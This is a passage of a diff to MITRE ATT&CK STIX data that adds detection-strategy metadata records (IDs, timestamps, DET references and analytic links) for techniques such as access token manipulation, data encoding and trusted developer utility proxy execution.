+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-Chain Detection for Remote Access Tools (Tool-Agnostic)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ba2056ee-77d7-49d4-a993-5806506964df",
+                        "x-mitre-analytic--d90a4f16-b5e1-4daa-bf65-91112fe02761",
+                        "x-mitre-analytic--97f27df6-5041-437b-9aeb-58a9bc33a376"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1f6a450a-fd29-4e5c-9708-1ae4616c28c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0124",
+                            "external_id": "DET0124"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1132.001 Data Encoding: Standard Encoding (Base64/Hex/MIME) across Windows, Linux, macOS, ESXi",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--861ee805-c979-44c9-8b0c-86bd3a6f5872",
+                        "x-mitre-analytic--904100f0-1af9-4ded-89be-dfda7180bcbc",
+                        "x-mitre-analytic--5eefb166-8f2b-45e0-b5c8-bf71984dec08",
+                        "x-mitre-analytic--1b53dd1b-c98e-4b25-a7fd-70dad586ebf1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8bcafe59-0a4b-4314-988b-085bf5cdf7a9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0326",
+                            "external_id": "DET0326"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1132.002 Data Encoding: Non-Standard Encoding across Windows, Linux, macOS, ESXi",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b8dea721-8e0d-4bcd-bde4-6609afd595e5",
+                        "x-mitre-analytic--09125bb1-29eb-4d40-994a-2e1aa7bcd105",
+                        "x-mitre-analytic--bdc546bb-9d92-489e-8aa8-8de1bd08f320",
+                        "x-mitre-analytic--e518b7e5-6e98-43f6-86c2-f45f684c650f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e9833c3c-b5ec-421b-bab4-91f74c2b6bd1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0354",
+                            "external_id": "DET0354"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1133 External Remote Services across Windows, Linux, macOS, Containers",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--63583dcb-dbdc-4b9d-a261-3129de12327e",
+                        "x-mitre-analytic--a3bca3ec-fd25-4b9d-bbce-9575ba96b8ef",
+                        "x-mitre-analytic--14f4930e-a2a5-45ae-9552-837c0a35e06b",
+                        "x-mitre-analytic--04fcf3d4-4547-4e64-bbb7-9faa46dda1f6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--774bbba8-45c2-403d-a445-3a64b3679faf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0283",
+                            "external_id": "DET0283"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1134 Access Token Manipulation on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c4cabd45-86a2-4842-9171-dff93f6ac737"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0b06e42c-ab1c-4fb7-834b-10293e904173",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0482",
+                            "external_id": "DET0482"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1134.001 Access Token Manipulation: Token Impersonation/Theft on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b76aeebb-3915-48ed-ac35-6af54c88c3bb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--78aa8d17-c96f-4ba9-b431-f91157f38553",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0456",
+                            "external_id": "DET0456"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1134.002 Create Process with Token (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0929e9c5-2e1a-4cc1-a9c5-df081b180201"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eb751740-80cd-4ec1-a989-8691bf7f2039",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0489",
+                            "external_id": "DET0489"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1134.004 Access Token Manipulation: Parent PID Spoofing (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--312f9f86-b987-483c-8b1d-955415eea946"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d32792e2-f927-492b-91bf-ac478cf64868",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0136",
+                            "external_id": "DET0136"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1134.005 Access Token Manipulation: SID-History Injection (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c061d938-cafa-4e9d-8729-29d63ba633ad"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e7870b55-7420-444a-9751-99fb5fbf4cd9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0182",
+                            "external_id": "DET0182"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1135 Network Share Discovery across Windows, Linux, and macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8a2537c3-9e9a-482d-81e2-281f88cf8878",
+                        "x-mitre-analytic--2de35397-ef03-4ffe-b531-d7ad61a6f41d",
+                        "x-mitre-analytic--5a9238a9-acd0-44f0-bd41-f86ef433775b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--994c7fc6-ad85-47e6-9079-fb872ec7e541",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0249",
+                            "external_id": "DET0249"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection for T1610 Deploy Container across Docker & Kubernetes control/node planes",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c345908d-4f74-4341-a203-8c76be2a136b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5fb0bb0d-cc9c-47aa-86f2-567b4ee642ff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0556",
+                            "external_id": "DET0556"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection strategy for T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e24b6c08-4fd0-40c7-a71a-762cc08d6085"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ec75b064-d8f1-40a7-832c-0ef0bb40214d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0191",
+                            "external_id": "DET0191"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection strategy for T1127.002 Trusted Developer Utilities Proxy Execution: ClickOnce (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dc4d944f-975a-4057-8edb-deb023db387c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--680956cb-d8c6-447c-99b4-82865fb89255",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0585",
+                            "external_id": "DET0585"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain detection strategy for T1127.003 Trusted Developer Utilities Proxy Execution: JamPlus (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3a5eea3b-b447-47c5-832d-6ced137b1597"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--98ae5e06-7ea5-49b9-b793-7f97b1d306b2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0151",
+                            "external_id": "DET0151"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain, platform-aware detection strategy for T1124 System Time Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bd34c127-9956-4616-999d-229f30512f74",
+                        "x-mitre-analytic--9f2278c6-2e45-42fb-a1f9-00f02d496c53",
+                        "x-mitre-analytic--252e5c07-8ae0-4ef8-9a98-c11b6c6d4d46",
+                        "x-mitre-analytic--2e51d33e-28d3-4e3f-a68a-38bc2d4abdde",
+                        "x-mitre-analytic--99ab1534-79b5-4660-83ed-3604bcb320f2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e9ee6ab5-333b-4cea-8637-23360d904472",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0197",
+                            "external_id": "DET0197"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain, platform-aware detection strategy for T1125 Video Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--171803bb-8aa7-42df-861a-18d6d694f909",
+                        "x-mitre-analytic--f3c5c71a-da1b-4d09-bda7-ec07b0b7c05d",
+                        "x-mitre-analytic--db3263c7-0abc-47be-a9f3-434d255b1e0e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f47cb8dc-2120-4541-9306-95053218ba8a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0172",
+                            "external_id": "DET0172"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain, platform-aware detection strategy for T1127 Trusted Developer Utilities Proxy Execution (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d69c9d97-17d6-4dad-a4d4-ec41e7fb34fb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--928a6ce6-fca0-4d66-aba3-1121431b953e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
